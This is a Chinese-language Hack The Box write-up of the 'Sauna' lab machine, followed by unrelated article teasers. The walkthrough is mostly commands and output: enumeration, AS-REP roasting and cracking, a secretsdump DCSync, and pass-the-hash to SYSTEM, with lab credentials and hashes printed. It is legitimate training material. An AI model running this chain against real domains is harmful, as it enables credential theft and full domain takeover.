HTB:Sauna[WriteUP]

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

将靶机TCP开放端口号提取并保存

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用nmap对靶机UDP开放端口进行脚本、服务扫描

使用gobuster对靶机进行路径FUZZ

使用gobuster对靶机子域名进行爆破查询

使用username-anarchy对该名单进行简单处理

使用smbclient列出靶机SMB共享

使用netexec通过靶机LDAP服务枚举靶机域内用户

边界突破

使用kerbrute通过上述处理好的名单枚举靶机域内用户

使用impacket-GetNPUsers尝试无认证获取该用户TGT

使用john尝试破解该哈希值

使用netexec通过靶机LDAP服务枚举域内用户

使用smbmap枚举靶机SMB共享

使用evil-winrm通过上述凭证登录靶机Win-RM服务

横向移动

使用winpeas枚举靶机系统

查看靶机系统用户

使用evil-winrm通过上述凭证登录靶机Win-RM服务

权限提升

尝试使用impacket-secretsdump提取域控中的哈希密码

此处取后半段的NTLM哈希可以直接通过evil-winrm登录

使用impacket-psexec直接提权至SYSTEM用户


连接至HTB服务器并启动靶机

靶机IP:10.10.10.175

分配IP:10.10.16.21


信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a 10.10.10.175 -r 1-65535 --ulimit 5000 | tee res

将靶机TCP开放端口号提取并保存
ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,
53,80,88,135,139,389,445,464,593,3268,3269,5985,9389,49667,49673,49674,49676,49689,49697
                                                                                                                               
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)
                                                                                                                               
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports
53,80,88,135,139,389,445,464,593,3268,3269,5985,9389,49667,49673,49674,49676,49689,49697

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -sT -p$ports -sCV -Pn 10.10.10.175

  • 需要重点关注的服务和信息

53端口:DNS服务

80端口:HTTP服务(Microsoft-IIS/10.0)

88端口:Kerberos服务

389端口:LDAP服务

445端口:SMB服务(SMB2)

5985端口:Win-RM服务

Domain:EGOTISTICAL-BANK.LOCAL

使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p$ports --script=vuln -O -Pn 10.10.10.175

使用nmap对靶机常用UDP端口进行开放扫描
nmap -sU --top-ports 20 -Pn 10.10.10.175

使用nmap对靶机UDP开放端口进行脚本、服务扫描
nmap -sU -p53,123 -sCV -Pn 10.10.10.175

使用gobuster对靶机进行路径FUZZ

gobuster dir -u http://sauna.htb -w ../dictionary/Entire-Dir.txt -x php,jsp,asp,aspx -t 200

使用gobuster对靶机子域名进行爆破查询
gobuster dns -d sauna.htb -w ../dictionary/subdomains-top20000.txt -t 50

  • 翻了一圈靶机HTTP服务后,我没有发现任何交互点

  • 点击About Us拉至页面最底部可以获得几个人名信息

  • 将其提取出来

┌──(root㉿kali)-[/home/kali/Desktop/tool/username-anarchy]
└─# cat << EOF > names.txt             
heredoc> Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver
heredoc> EOF

使用username-anarchy对该名单进行简单处理
./username-anarchy -i names.txt > names_res.txt

使用smbclient列出靶机SMB共享

smbclient -L \\10.10.10.175

使用netexec通过靶机LDAP服务枚举靶机域内用户

netexec ldap 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL --users


边界突破

使用kerbrute通过上述处理好的名单枚举靶机域内用户

kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 ./names_res.txt

使用impacket-GetNPUsers尝试无认证获取该用户TGT

impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip 10.10.10.175 -no-pass

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:27de1b801864c58fa633cf353cb73fa9$700a291ac3d952433fd8f4a03bef742708d1cc661a4c6ae86c2c56a792d71282e766e4ea8436e5942ade82381c63bf0149faf494d74a45581184fe7d3bed143e1c5610f3d67d248b5bc8d0933b53f11d3b99f853da8690ed2665dc166838df952935f5a4621319ee243d605a405680488cf9a3361d626525d2b80dc1b819fe40e9b009495cd87b2ff75a8c4156f18e414d8c68cff8732e646bc2fb3ea929199f7abd8056648c93427883d2d484d1521b6cc169d13d8c158b27cfbce6123432d51e630949fd25492aac898723036f94fcb342aa9a72bf965c32afc7f900f620abc62e9a6af823f50aec67085745586cd2161b56a07e3eb33db177726fe803b9ed

使用john尝试破解该哈希值

john fsmith.hash --format=krb5asrep --wordlist=../dictionary/rockyou.txt

账户:fsmith

密码:Thestrokes23

使用netexec通过靶机LDAP服务枚举域内用户
netexec ldap 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u fsmith -p 'Thestrokes23' --users

使用smbmap枚举靶机SMB共享
smbmap -H 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'

使用evil-winrm通过上述凭证登录靶机Win-RM服务

evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'

  • 在C:\Users\FSmith\Desktop目录下找到user.txt文件


横向移动

使用winpeas枚举靶机系统

查看靶机系统用户
net user

*Evil-WinRM* PS C:\Users\FSmith\Documents> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
The command completed with one or more errors.

  • 看起来该账户应该是:svc_loanmgr

账户:svc_loanmgr

密码:Moneymakestheworldgoround!

使用evil-winrm通过上述凭证登录靶机Win-RM服务

evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'


权限提升

尝试使用impacket-secretsdump提取域控中的哈希密码

impacket-secretsdump 'EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'

  • 这里拿到了Administrator的哈希密码
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
此处取后半段的NTLM哈希可以直接通过evil-winrm登录
evil-winrm -i 10.10.10.175 -u 'Administrator' -H '823452073d75b9d1cf70ebdf86c7f98e'

使用impacket-psexec直接提权至SYSTEM用户
impacket-psexec EGOTISTICAL-BANK.LOCAL/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e

  • 在C:\Users\Administrator\Desktop目录下找到root.txt文件

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/958006.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

wireshark工具简介

目录 1 wireshark介绍 2 wireshark抓包流程 2.1 选择网卡 2.2 停止抓包 2.3 保存数据 3 wireshark过滤器设置 3.1 显示过滤器的设置 3.2 抓包过滤器 4 wireshark的封包列表与封包详情 4.1 封包列表 4.2 封包详情 参考文献 1 wireshark介绍 wireshark是非常流行的网络…

2025.1.20——一、[RCTF2015]EasySQL1 二次注入|报错注入|代码审计

题目来源&#xff1a;buuctf [RCTF2015]EasySQL1 目录 一、打开靶机&#xff0c;整理信息 二、解题思路 step 1&#xff1a;初步思路为二次注入&#xff0c;在页面进行操作 step 2&#xff1a;尝试二次注入 step 3&#xff1a;已知双引号类型的字符型注入&#xff0c;构造…

kong 网关和spring cloud gateway网关性能测试对比

该测试只是简单在同一台机器设备对spring cloud gateway网关和kong网关进行对比&#xff0c;受限于笔者所拥有的资源&#xff0c;此处仅做简单评测。 一、使用spring boot 的auth-service作为服务提供者 该服务提供了一个/health接口&#xff0c;接口返回"OK"&…

winfrom项目,引用EPPlus.dll实现将DataTable 中的数据保存到Excel文件

最近研究不安装office也可以保存Excel文件&#xff0c;在网上查询资料找到这个方法。 第一步&#xff1a;下载EPPlus.dll文件&#xff08;自行去网上搜索下载&#xff09; 第二步&#xff1a;引用到需要用的项目中&#xff0c;如图所示&#xff1a; 第三步&#xff1a;写代码…

框架层实现cpu高负载(cpuload)的检测方案

摘要 这是2018年在小厂的老方案了&#xff0c;现在看方案已经过时了也不太合理&#xff0c;仅供参考&#xff0c;上层框架开启一个5分钟定时器&#xff0c;检测5分钟内总cpu负载和每个线程cpu负载情况&#xff0c;当检测到cpu负载大于绿盟性能或功耗定义的阈值时&#xff0c;结…

Android BitmapShader简洁实现马赛克,Kotlin(一)

Android BitmapShader简洁实现马赛克&#xff0c;Kotlin&#xff08;一&#xff09; 这一篇&#xff0c; Android使用PorterDuffXfermode模式PorterDuff.Mode.SRC_OUT橡皮擦实现马赛克效果&#xff0c;Kotlin&#xff08;3&#xff09;-CSDN博客 基于PorterDuffXfermode实现马…

人工智能在数字化转型中的角色:从数据分析到智能决策

引言 在数字化转型浪潮中&#xff0c;人工智能&#xff08;AI&#xff09;正迅速崛起&#xff0c;成为推动企业创新和变革的关键力量。面对日益复杂的市场环境和激烈的行业竞争&#xff0c;企业亟需借助技术手段提高运营效率、优化决策过程&#xff0c;并增强市场竞争力。而AI…

「全网最细 + 实战源码案例」设计模式——工厂方法模式

核心思想 简单工厂模式是一种创建者模式&#xff0c;它通过一个工厂类负责创建不同类型的对象&#xff0c;根据传入的参数决定实例化的具体类&#xff0c;也被称为“静态工厂方法”模式&#xff0c;因为工厂方法通常是静态的。 结构 1. 工厂类&#xff1a; 提供一个静态方法…

我的图形布局 组织结构图布局

组织结构图布局,有的人也叫它树状布局,在图形中是经常用到的布局算法.形成类似如下图的图形布局方式 首先创建一个类, public class TreeLayouter {private int m_space 40;/// <summary>/// 空间间隔/// </summary>public int Space{get { return m_space; }se…

Golang:使用DuckDB查询Parquet文件数据

本文介绍DuckDB查询Parquet文件的典型应用场景&#xff0c;掌握DuckDB会让你的产品分析能力更强&#xff0c;相反系统运营成本相对较低。为了示例完整&#xff0c;我也提供了如何使用Python导出MongoDB数据。 Apache Parquet文件格式在存储和传输大型数据集方面变得非常流行。最…

Rust Actix Web 项目实战教程 mysql redis swagger:构建用户管理系统

Rust Actix Web 项目实战教程&#xff1a;构建用户管理系统 项目概述 本教程将指导你使用 Rust 和 Actix Web 构建一个完整的用户管理系统&#xff0c;包括数据库交互、Redis 缓存和 Swagger UI 文档。 技术栈 Rust 编程语言Actix Web 框架SQLx (MySQL 数据库)Redis 缓存Uto…

校园网上店铺的设计与实现(代码+数据库+LW)

摘 要 如今社会上各行各业&#xff0c;都喜欢用自己行业的专属软件工作&#xff0c;互联网发展到这个时候&#xff0c;人们已经发现离不开了互联网。新技术的产生&#xff0c;往往能解决一些老技术的弊端问题。因为传统校园店铺商品销售信息管理难度大&#xff0c;容错率低&a…

生成对抗网络(GAN)入门与编程实现

生成对抗网络&#xff08;Generative Adversarial Networks, 简称 GAN&#xff09;自 2014 年由 Ian Goodfellow 等人提出以来&#xff0c;迅速成为机器学习和深度学习领域的重要工具之一。GAN 以其在图像生成、风格转换、数据增强等领域的出色表现&#xff0c;吸引了广泛的研究…

26、正则表达式

目录 一. 匹配字符 .&#xff1a;匹配除换行符外的任意单个字符。 二. 位置锚点 ^&#xff1a;匹配输入字符串的开始位置。 $&#xff1a;匹配输入字符串的结束位置。 \b&#xff1a;匹配单词边界。 \B&#xff1a;匹配非单词边界。 三. 重复限定符 *&#xff1a;匹配…

电子应用设计方案101:智能家庭AI喝水杯系统设计

智能家庭 AI 喝水杯系统设计 一、引言 智能家庭 AI 喝水杯系统旨在为用户提供个性化的饮水提醒和健康管理服务&#xff0c;帮助用户养成良好的饮水习惯。 二、系统概述 1. 系统目标 - 精确监测饮水量和饮水频率。 - 根据用户的身体状况和活动量&#xff0c;智能制定饮水计划。…

数据表中的数据查询

文章目录 一、概述二、简单查询1.列出表中所有字段2.“*”符号表示所有字段3.查询指定字段数据4.DISTINCT查询 三、IN查询四、BETWEEN ADN查询1.符合范围的数据记录查询2.不符合范围的数据记录查询 五、LIKE模糊查询六、对查询结果排序七、简单分组查询1.统计数量2.统计计算平均…

【HarmonyOS NAPI 深度探索12】创建你的第一个 HarmonyOS NAPI 模块

【HarmonyOS NAPI 深度探索12】创建你的第一个 HarmonyOS NAPI 模块 在本篇文章中&#xff0c;我们将一步步走过如何创建一个简单的 HarmonyOS NAPI 模块。通过这个模块&#xff0c;你将能够更好地理解 NAPI 的工作原理&#xff0c;并在你的应用中开始使用 C 与 JavaScript 的…

步入响应式编程篇(二)之Reactor API

步入响应式编程篇&#xff08;二&#xff09;之Reactor API 前言回顾响应式编程Reactor API的使用Stream引入依赖Reactor API的使用流源头的创建 reactor api的背压模式发布者与订阅者使用的线程查看弹珠图查看形成新流的日志 前言 对于响应式编程的基于概念&#xff0c;以及J…

Unity Line Renderer Component入门

Overview Line Renderer 组件是 Unity 中用于绘制连续线段的工具。它通过在三维空间中的两个或两个以上的点的数组&#xff0c;并在每个点之间绘制一条直线。可以绘制从简单的直线到复杂的螺旋线等各种图形。 1. 连续性和独立线条 连续性&#xff1a;Line Renderer 绘制的线条…

使用Chrome和Selenium实现对Superset等私域网站的截图

最近遇到了一个问题&#xff0c;因为一些原因&#xff0c;我搭建的一个 Superset 的 Report 功能由于节假日期间不好控制邮件的发送&#xff0c;所以急需一个方案来替换掉 Superset 的 Report 功能 首先我们需要 Chrome 浏览器和 Chrome Driver&#xff0c;这是执行数据抓取的…